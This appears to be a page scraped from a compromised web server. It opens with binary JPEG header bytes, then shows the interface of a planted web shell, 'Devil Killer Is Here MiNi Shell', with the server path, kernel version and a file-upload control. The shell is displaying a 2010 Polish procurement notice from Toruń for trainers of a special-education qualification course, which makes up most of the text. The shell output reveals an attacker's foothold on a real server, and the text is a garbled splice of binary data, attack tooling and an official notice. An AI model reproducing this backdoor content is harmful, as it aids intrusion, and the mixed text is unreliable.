JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100428/102695-N-2010.html

<p class="kh_header"><b>Toruń: przygotowanie autorskich scenariuszy i prowadzenie zajęć podczas kursu kwalifikacyjnego z oligofrenopedagogiki, realizowanych w ramach Projektu pt. Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli.</b><br>
<b>Numer ogłoszenia: 102695 - 2010; data zamieszczenia: 28.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorskie Centrum Edukacji Nauczycieli , Aleja Solidarności 3, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 62 277 47, faks 56 62 231 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpcen-torun.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przygotowanie autorskich scenariuszy i prowadzenie zajęć podczas kursu kwalifikacyjnego z oligofrenopedagogiki, realizowanych w ramach Projektu pt. Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie autorskich scenariuszy i prowadzenie zajęć podczas czterech edycji kursu kwalifikacyjnego z oligofrenopedagogiki. 
Prowadzący zajęcia ma spełniać wszystkie wymagania niezbędne i co najmniej trzy wymagania dodatkowe określone w rozdziale VIII niniejszej specyfikacji
Zajęcia mają być realizowane w wymiarze godzinowym (ilość godzin zgodna zestawieniami przedstawionymi w niniejszej specyfikacji) wg. ustalonego harmonogramu.
Treści zajęć muszą odpowiadać celom wyszczególnionym w niniejszej specyfikacji.
Odbiór usługi zostanie udokumentowany przekazaniem Zamawiającemu scenariuszy zajęć, przekazaniem Zamawiającemu do powielenia materiałów dla uczestników kursu, zapisami w dzienniku kursu czasu i tematyki zajęć.

Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
Zamawiający nie przewiduje możliwości składania ofert wariantowych.
Zamawiający nie przewiduje zastosowania aukcji elektronicznej.

SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA

Od Wykonawcy wymagana jest dyspozycyjność, mobilność - możliwość prowadzenia zajęć na terenie całego województwa kujawsko-pomorskiego, a także  możliwość prowadzenia zajęć w weekendy oraz gotowość do prowadzenia zajęć wg ustalonego harmonogramu. Zamawiający wskazuje i zabezpiecza miejsce oraz termin prowadzenia zajęć, a Wykonawca jest zobowiązany przeprowadzić szkolenie we wskazanym miejscu i terminie.  

Zamówienie składa się z części.
Częścią jest każdy moduł.
Do wszystkich części odnoszą się poniższe uwagi:
Cele kursu 
cel ogólny :
- wyposażenie słuchaczy w wiedzę i umiejętności umożliwiające programowanie i podejmowanie skutecznych oddziaływań rewalidacyjnych i psychokorekcyjnych w stosunku do dzieci i młodzieży niepełnosprawnej umysłowo w różnym stopniu (lekkim, umiarkowanym i znacznym) przebywających w różnych formach kształcenia specjalnego oraz środowisku rodzinnym.

przewidywane efekty szkolenia: 
W ramach realizowanego programu kursu szczególnie ważne jest wyposażenie 	słuchaczy w wiedzę i umiejętności przydatne w jego pracy zawodowej w zakresie:
- planowania pracy dydaktyczno - wychowawczej z uwzględnieniem współczesnych koncepcji nauczania i uczenia się oraz wychowywania osób niepełnosprawnych umysłowo,
- trafnego doboru i stosowania współczesnych form i metod kształcenia oraz usprawniania społecznego osób niepełnosprawnych umysłowo,
- podejmowania czynności diagnostycznych (diagnoza psychopedagogiczna) w zakresie określania u dzieci i młodzieży niepełnosprawnej umysłowo trudności w uczeniu się oraz ujawniania zachowań społecznie oczekiwanych,
- współpracy ze środowiskiem rodzinnym dziecka niepełnosprawnego umysłowo oraz środowiskiem lokalnym,
- podejmowania inicjatyw organizowania wsparcia środowiska rodzinnego w pracy 
z osobami przejawiającymi różny stopień niepełnosprawności intelektualnej,
- organizowania wsparcia pozainstytucjonalnego w opiece, edukacji i wychowaniu uczniów z niepełnosprawnością intelektualną,
- wdrażanie do zamiany systemu edukacyjnego z segregacyjnego na integracyjny 
z ukierunkowaniem na inkluzyjny.
Wymagania  dotyczące opracowania scenariuszy zajęć:

1.	zgodność treści zajęć z celami ogólnymi programu i celami szczegółowymi modułu,
2.	dostosowanie struktury zajęć (zakres treści, ich logiczny układ, czas ich trwania) do celów programu,
3.	celowość doboru metod i form pracy,
4.	przydatność przewidywanych efektów szkolenia 
5.	zgodność treści szkolenia ze stanem aktualnej wiedzy teoretycznej i praktycznej na dany temat.

Zamawiający dopuszcza składanie ofert przez jednego Wykonawcę na każdą z części wyodrębnionych w przedmiocie zamówienia. Postanowienia specyfikacji, zwłaszcza dotyczące oceny ofert i wymaganych dokumentów dotyczą każdej części..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają:

doświadczenie w zakresie edukacji dorosłych 
doświadczenie w zakresie prowadzenia szkoleń w obszarze tematyki zgłaszanej w przetargu/projekcie i na dowód tego wykażą, że w okresie 3 lat, a jeżeli okres prowadzenia szkoleń jest krótszy, to w tym czasie przeprowadzili 3 szkolenia lub uczestniczyli jako wykładowcy w 3 szkoleniach w zakresie edukacji osób dorosłych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują osobami zdolnymi do wykonania zamówienia, tj. osobami, które posiadają poniższe kwalifikacje zawodowe - warunki obowiązkowe: 

wykształcenie wyższe w zakresie pedagogiki lub pedagogiki specjalnej, oligofrenopedagogiki, psychologii.
ukończone studia podyplomowe lub kursy kwalifikacyjne w zakresie pedagogiki specjalnej, terapii pedagogicznej, socjoterapii.

oraz wykażą spełnienie przynajmniej trzech z poniższych warunków opcjonalnych:
Nauczyciel dyplomowany.
Staż pracy z dziećmi i młodzieżą z niepełnosprawnością intelektualną różnego stopnia. 
Doświadczenie w zakresie przeprowadzania badań diagnostycznych; diagnozy wielofunkcyjnej, psychologiczno-pedagogicznej dzieci i młodzieży niepełnosprawnej intelektualnie.
Znajomość prawa oświatowego w zakresie kształcenia specjalnego oraz projektowanych przez MEN zmian dotyczących edukacji uczniów o specjalnych potrzebach edukacyjnych
Autor publikacji lub programów autorskich w zakresie tematyki zgłaszanej w projekcie.
Ukończyli szkolenie z zakresu tematyki gender - w przypadku zamiaru prowadzenia szkolenia z tej tematyki jest to warunek konieczny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Przedstawiony scenariusz zajęć - 35</li>
<li>3 - Spełnianie kryteriów dodatkowych - 35</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Poza przypadkami określonymi w umowie zmiany umowy będą mogły nastąpić w wymienionych niżej okolicznościach:
a)	Zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar, inne klęski żywiołowe, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej.
b)	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
c)	Powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
d)	Zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w momencie zawarcia umowy - zmianie mogą ulec termin realizacji umowy bądź terminy wynikające z harmonogramów płatności,
e)	Gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacja istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności w zakresie zmiany przedmiotu zamówienia,  terminu realizacji, a także innych wymienionych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpcen-torun.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kujawsko-Pomorskie Centrum Edukacji Nauczycieli
Ul. Al. Solidarności 3
87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2010 godzina 15:00, miejsce: Kujawsko-Pomorskie Centrum Edukacji Nauczycieli
Ul. Al. Solidarności 3
87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT WSPÓŁFINANSOWANY Z FUNDUSZY UNII EUROPEJSKIEJ W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI
Priorytet  IX, Rozwój wykształcenia i kompetencji w regionach
Działanie 9.4,Wysoko wykwalifikowane kadry systemu oświaty
Tytuł projektu: Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MODUŁ 1
Prawo oświatowe w zakresie kształcenia specjalnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe
Uczestnik:
-   zna przepisy prawa dotyczące edukacji dzieci i młodzieży z upośledzeniem umysłowym
- zna projektowane przez MEN zmiany dotyczące edukacji uczniów ze specjalnymi potrzebami edukacyjnymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MODUŁ 2
Pedagogika specjalna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe
Uczestnik:
- zna podstawowe zadania pedagogiki specjalnej oraz jej związki z innymi naukami,
- zna aktualnie obowiązujące przepisy prawa oświatowego dotyczące kształcenia specjalnego,
- zna podstawowe zasady, formy i metody rehabilitacji, rewalidacji i resocjalizacji,
- zna aktualną strukturę form kształcenia specjalnego w Polsce i wybranych krajach,
- zna i rozumie nowe tendencje i aktualne problemy pedagogiki specjalnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MODUŁ 3
Oligofrenopedagogika.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe
Uczestnik:
- potrafi analizować i ustalać ogólne prawidłowości i mechanizmy stanowiące podstawę rozwoju psychofizycznego oraz społecznego osób z niepełnosprawnością intelektualną; 
- potrafi zaplanować własną pracę dydaktyczno - wychowawczą i środowiskową 
z uwzględnieniem współczesnych koncepcji stymulowania rozwoju osób z niepełnosprawnością intelektualną; stopnia upośledzenia umysłowego, wieku oraz zaburzeń psychosomatycznych występujących u dziecka;
- potrafi podejmować czynności diagnostyczne (diagnoza wielospecjalistyczna) w zakresie oceny zachowań oczekiwanych społecznie ujawnianych przez osoby z niepełnosprawnością intelektualną;
- potrafi dokonać trafnej diagnozy uwarunkowań psychopedagogicznych przebiegu procesu rewalidacji w środowisku instytucjonalnym (ośrodki szkolno - wychowawcze, szkoły specjalne itp.) i pozainstytucjonalnym (rodzina, grupy lokalne) osób z niepełnosprawnością intelektualną;
- umie ustalić psychopedagogiczne podstawy integracji osób z niepełnosprawnością intelektualną ze środowiskiem społecznym;
- potrafi prowadzić pracę rewalidacyjną w środowisku rodzinnym osób z niepełnosprawnością intelektualną;
- dostrzega relacje między oligofrenopedagogiką a innymi dyscyplinami naukowymi wspierającymi proces rehabilitacji z niepełnosprawnością intelektualną;
- umie wyciągać praktyczne wnioski wynikające ze specyfiki uczenia się osób z niepełnosprawnością intelektualną, stanowiące podstawę organizowania procesu kształcenia oraz doboru technik modyfikacji zachowań;
- dostrzega i uwzględnia w praktyce podstawowe tendencje oraz kierunki przemian zachodzących we współczesnej teorii kształcenia osób z niepełnosprawnością intelektualną z uwzględnieniem ewolucji treści, form i metod rehabilitacyjnych;
- wyraża gotowość do ciągłych poszukiwań twórczych w zakresie modyfikowania treści, form, metod w procesie rehabilitacji osób z niepełnosprawnością intelektualną w zależności od stopnia niepełnosprawności intelektualnej, wieku i rodzaju placówki opiekuńczo-wychowawczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MODUŁ 4 
Podstawy psychologiczne rewalidacji niepełnosprawnych umysłowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe
Uczestnik:
-  potrafi stosować w praktyce wybrane techniki służące do diagnozowania poziomu rozwoju umysłowego, 
-  potrafi określić wiek rozwojowy i strefę najbliższego rozwoju dziecka,
-  posiada podstawową wiedzę dotyczącą rozwoju poznawczego oraz emocjonalno - społecznego dziecka oraz potrafi ją wykorzystać w praktyce,
-  potrafi wytyczyć kierunki oddziaływań terapeutycznych, dobrać odpowiednie metody i formy pracy uwzględniając specyficzne potrzeby uczniów niepełnosprawnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MODUŁ 5 
Rewalidacja indywidualna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe
Uczestnik:
-  potrafi dokonać weryfikacji i indywidualizacji programu wspomagania dziecka,
-  potrafi podejmować działania wspomagające rozwój dziecka,
- dokonuje wyboru adekwatnych form terapii indywidualnej i grupowej w stosunku do wybranego przypadku,
- potrafi dokonać właściwego doboru treści, form, metod i środków do indywidualnych potrzeb i możliwości uczniów,
- posiada wiedzę i umiejętności empatycznego podejścia do problemów i potrzeb dziecka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MODUŁ 6 
Metodyka nauczania i wychowania dzieci niepełnosprawnych umysłowo w stopniu lekkim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe
Uczestnik:
- zna i rozumie specyfikę uczenia się dzieci i młodzieży z niepełnosprawnością umysłową w stopniu lekkim
- zna teorie i praktykę nauczania i wychowania dzieci i młodzieży z niepełnosprawnością umysłową w stopniu lekkim
- potrafi zaplanować, organizować i prowadzić zięcia dydaktyczno -wychowawcze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MODUŁ 7 
Metodyka wychowania dzieci i młodzieży z niepełnosprawnością w stopniu umiarkowanym i znacznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe
Uczestnik:
- potrafi organizować środowisko wychowawcze i terapeutyczne usprawniające dziecko niepełnosprawne umysłowo w stopniu umiarkowanym i znacznym
- potrafi przeprowadzić diagnozę funkcjonowania społecznego dziecka
- potrafi tworzyć indywidualne programy pracy z dzieckiem i dokonywać analizy i oceny dynamiki rozwoju..</p></li>
